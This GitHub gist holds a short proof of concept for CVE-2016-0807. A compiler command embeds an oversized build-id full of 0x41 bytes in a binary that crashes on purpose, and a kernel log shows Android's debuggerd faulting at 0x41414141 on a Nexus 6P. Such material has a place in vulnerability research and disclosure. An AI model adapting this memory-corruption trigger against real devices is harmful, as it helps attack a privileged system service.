-
-
Save fxfactorial/555ecd2f452bc254e28a to your computer and use it in GitHub Desktop.
Crashing Android Debuggerd on Nexus 6P with CVE-2016-0807
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| arm-linux-androideabi-gcc -pie -Wl,--build-id=0x`perl -e 'print "41"x4096'` --sysroot /home/zhuowei/android/prebuilts/ndk/9/platforms/android-9/arch-arm c.c |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| int main() {*((int*)0)=4;} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [515852.332396] debuggerd[24612]: unhandled level 1 translation fault (11) at 0x41414141, esr 0x92000045 | |
| [515852.332404] pgd = ffffffc03dd3c000 | |
| [515852.332411] [41414141] *pgd=0000000000000000 | |
| [515852.332413] | |
| [515852.332426] CPU: 1 PID: 24612 Comm: debuggerd Tainted: G W 3.10.73-g9741316 #1 | |
| [515852.332433] task: ffffffc0022f5600 ti: ffffffc002a08000 task.ti: ffffffc002a08000 | |
| [515852.332441] PC is at 0xab1b90c4 | |
| [515852.332444] LR is at 0xf721567f | |
| [515852.332448] pc : [<00000000ab1b90c4>] lr : [<00000000f721567f>] pstate: 600f0030 | |
| [515852.332450] sp : 00000000ffa4b210 | |
| [515852.332454] x12: 00000000f7082048 | |
| [515852.332460] x11: 00000000ffffffe4 x10: 00000000ab182000 | |
| [515852.332466] x9 : 0000000000000005 x8 : 00000000ffa4b280 | |
| [515852.332471] x7 : 0000000000001000 x6 : 00000000ffa4b448 | |
| [515852.332477] x5 : 00000000f708ccd0 x4 : 00000000f730b7fd | |
| [515852.332483] x3 : 00000000000000aa x2 : 00000000c6e17424 | |
| [515852.332488] x1 : 0000000000000000 x0 : 0000000041414141 | |
| [515852.332490] | |
| [515852.334689] init: Service 'debuggerd' (pid 24612) killed by signal 11 | |
| [515852.334716] init: Service 'debuggerd' (pid 24612) killing any children in process group |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment